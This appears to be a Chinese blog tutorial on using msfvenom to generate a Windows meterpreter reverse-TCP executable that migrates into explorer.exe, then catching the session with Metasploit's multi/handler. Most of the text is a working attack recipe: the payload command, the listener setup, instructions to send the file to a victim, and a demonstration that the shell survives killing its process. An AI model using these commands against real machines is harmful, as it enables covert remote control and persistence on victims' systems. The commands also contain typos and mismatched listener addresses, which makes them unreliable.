欢迎光临
我们一直在努力

使用Msfvenom隐藏和转移shell

如果您是渗透测试人员,那么这可能有助于对目标系统的攻击创建强大的payload。在本文中,您将了解更多关于msfvenom的功能,这里我们将创建一个有别于我上一个教程的payload。如果当前进程被杀死,有效载荷会迁移其进程,因此如果受害者从其系统中杀死payload所在的进程ID,攻击者也不会丢失其会话。

开始

在kali Linux中打开终端,并输入以下命令来生成exe格式的payload。

Msfvenom –p windows/meterpreter/reverse_tcp 

lhost=192.168.1.104

lport=5555

prependmigrate=true

prepenmigrateprocess=explorer.exe –f exe > /root/Desktop/raj.exe

以上命令会在桌面上创建raj.exe文件,现在将这个文件发送到远程系统进行攻击。

msf1 使用Msfvenom隐藏和转移shell

加载metasploit框架并键入以下命令来启动攻击。

msfconsole

use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.104

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

当受害者打开raj.exe文件,我们将获得meterpreter会话。

meterpreter> sysinfo

msf1 使用Msfvenom隐藏和转移shell

现在让我们检查一下我们的payload的进程ID。

meterpreter> ps

从突出显示的文本中,您可以看到显示的进程ID:raj.exe(4960)

msf1 使用Msfvenom隐藏和转移shell

现在攻击者尝试自己kill掉raj.exe的进程验证进程迁移,结果进程4960被杀死。

meterpreter> kill 4960

但是我们仍然有受害者的会话,这意味着raj.exe文件迁移到新的进程ID。

meterpreter> sysinfo

msf1 使用Msfvenom隐藏和转移shell

 

未经允许不得转载:杂术馆 » 使用Msfvenom隐藏和转移shell
分享到: 更多 (0)